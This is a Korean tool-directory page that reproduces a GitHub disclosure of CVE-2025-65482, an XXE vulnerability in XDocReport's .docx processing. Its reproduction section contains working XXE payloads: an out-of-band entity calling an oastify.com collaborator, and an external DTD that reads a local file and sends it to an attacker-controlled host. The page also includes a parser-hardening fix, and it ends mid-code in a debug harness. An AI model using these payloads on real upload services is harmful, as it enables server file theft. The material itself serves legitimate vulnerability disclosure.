Skip to content
KitploitKITPLOIT
도구블로그
Log in
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-65482-XXE- — CVE-2025-65482 (XXE) | Kitploit
도구/GitHubGitHub/at190510-cuong/cve-2025-65482-xxe-
Vulnerability AnalysisExploitationWeb Application ExploitationData ExfiltrationPapers & ResearchLearning & Education
GitHubat190510-cuong/cve-2025-65482-xxe-

CVE-2025-65482-XXE-

CVE-2025-65482 (XXE)

저장소 보기
11010개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-65482 (XXE)

XDocReport의 XML 외부 엔터티 주입(XXE)

버그 정의

XML 외부 엔터티 주입

취약점 개요

  • XML 외부 엔터티 주입(XXE)은 XML 형식 데이터 처리 시 사용자가 외부 파일이나 시스템을 참조하는 XML 데이터를 삽입하는 취약점입니다. 공격자는 이렇게 확인된 XXE 취약점을 사용하여 다른 시스템을 스캔하여 열려 있는 서비스 포트를 찾고, 비밀 파일을 요청하고, 그렇지 않으면 사용할 수 없는 연결된 시스템의 기능에 접근할 수 있습니다. 이를 통해 공격자는 데이터를 추출하고, 시스템과 상호 작용하며, XML 삽입을 통해 서비스 중단을 유발할 수 있습니다.

비즈니스 영향

  • XXE는 사용자의 신뢰 상실로 인해 기업의 평판 손상으로 이어질 수 있습니다. 또한 데이터 도난 및 위반된 PII 데이터의 통지, 수정 비용을 통해 간접적인 재정 손실을 초래할 수 있습니다.

심각도 높음

image

설명 및 영향

인사 관리 웹사이트에서 사용자가 .docx 문서 파일을 시스템에 업로드할 수 있습니다. 처리 과정에서 애플리케이션은 fr.opensagres.xdocreport.document.docx 라이브러리를 사용하는데, 이 라이브러리는 사용자의 .docx 파일을 SAXParser로 전달할 때 XXE 취약점을 포함하고 있습니다.

영향을 받는 구성 요소

fr.opensagres.xdocreport.template.docx — XDocReport (버전 =< 2.0.3)

근본 원인 분석

원인: Apache POI 사용

fr.opensagres.xdocreport.document.docx
   └── fr.opensagres.xdocreport.document
         └── fr.opensagres.xdocreport.template
               └── fr.opensagres.xdocreport.converter
                     └── org.apache.poi.xwpf.converter.core
                           ├── org.apache.poi:poi
                           └── org.apache.poi:poi-ooxml

즉, Apache POI가 깊숙이 위치한 모듈:

org.apache.poi.xwpf.converter.core

image

오류는 XDocReport(fr.opensagres.xdocreport.document.docx 모듈)가 Apache POI를 사용하여 .docx 파일을 읽고, POI는 Java 기본 SAXParser를 사용하는데 DTD 및 외부 엔터티 처리를 허용하는 기능을 비활성화하지 않기 때문에 발생합니다. → 이를 통해 공격자는 외부(SYSTEM "http://...") 또는 내부 파일(file:///...)을 가리키는 엔터티가 있는 DOCTYPE을 삽입할 수 있습니다 → XXE가 발생합니다.

image

XDocReport → fr.opensagres.xdocreport.document.docx → Apache POI (org.apache.poi.xwpf.converter.core) → SAXParser (javax.xml.parsers.SAXParser)

재현 단계

  • 임의의 docx 파일 압축 풀기
unzip ../vcspentest.docx

image

  • docx 내의 document.xml 파일 내용 수정
nano word/document.xml

image

다음과 같은 outband 페이로드를 collabrator를 통해 전송하도록 편집:

<!DOCTYPE x [ <!ENTITY xxe SYSTEM "http://qrlbu64xvd8jr1y8zwcgoiwnler5fx3m.oastify.com/"> ]>
<x>&xxe;</x>

image

  • poc 파일로 다시 압축
 zip -r ../poc.docx *

image

image

  • 수정된 docx 파일을 업로드하여 xdocreport 처리 통과

image

  • 결과적으로 collabrator로 요청이 전송된 것을 확인

image

  • 영향도를 높여 시스템 내 파일 읽기
  • WSL 머신 172.26.208.130에 dtd 파일을 호스팅합니다. vcspentest.dtd 파일 내용은 다음과 같습니다:
<!ENTITY % file SYSTEM "file:///d:/vcspentest.txt">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://172.26.208.130:8888/?x=%file;'>">
%eval;
%exfil;

image

image

WSL 머신에서 외부 dtd를 로드하기 위해 .docx 파일 내 word/document.xml 파일을 다음과 같이 편집:

<!DOCTYPE users [<!ENTITY % xxe SYSTEM "http://172.26.208.130:8888/vcspentest.dtd"> %xxe;]>

image

  • 파일을 zip하여 .docx로 만들고 서버에 업로드하여 처리

image

image

  • WSL 머신에서 대상 서버의 D:/vcspentest.txt 파일 내용이 포함된 요청이 전송된 것을 확인

image

image

해결 방법

  • https://github.com/opensagres/xdocreport/pull/547/commits/a8e48d17f02c19b807efe450d20f1755e45d818b

image

코드 또는 XML 파서 구성 계층에서 DTD 및 외부 엔터티와 관련된 모든 기능을 비활성화해야 합니다.

다음 코드와 유사하게 수정

    @RequestMapping(value = "/SAXParser/vuln", method = RequestMethod.POST)
    public String SAXParserVuln(HttpServletRequest request) {
        try {
            String body = WebUtils.getRequestBody(request);
            logger.info(body);

            SAXParserFactory spf = SAXParserFactory.newInstance();
            SAXParser parser = spf.newSAXParser();
            parser.parse(new InputSource(new StringReader(body)), new DefaultHandler());  // parse xml

            return "SAXParser xxe vuln code";
        } catch (Exception e) {
            logger.error(e.toString());
            return EXCEPT;
        }
    }


    @RequestMapping(value = "/SAXParser/sec", method = RequestMethod.POST)
    public String SAXParserSec(HttpServletRequest request) {
        try {
            String body = WebUtils.getRequestBody(request);
            logger.info(body);

            SAXParserFactory spf = SAXParserFactory.newInstance();
            spf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
            spf.setFeature("http://xml.org/sax/features/external-general-entities", false);
            spf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
            SAXParser parser = spf.newSAXParser();
            parser.parse(new InputSource(new StringReader(body)), new DefaultHandler());  // parse xml
        } catch (Exception e) {
            logger.error(e.toString());
            return EXCEPT;
        }
        return "SAXParser xxe security code";
    }

디버그 환경 설정

image

  • Main.java 파일에서
package org.example;

import fr.opensagres.xdocreport.document.IXDocReport;
import fr.opensagres.xdocreport.document.registry.XDocReportRegistry;
import fr.opensagres.xdocreport.template.IContext;
import fr.opensagres.xdocreport.template.TemplateEngineKind;

import java.io.*;
import java.io.File;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.InputStream;
import java.io.OutputStream;

public class Main {

    public static void main(String[] args) {
        try {
            // Đọc file đầu vào chứa biểu thức Velocity
            File docxTemplate = new File("C:\\Users\\HP\\Downloads\\New folder (3)\\poc.docx"); // File đầu vào
            InputStream input = new FileInputStream(docxTemplate);
도구 다운로드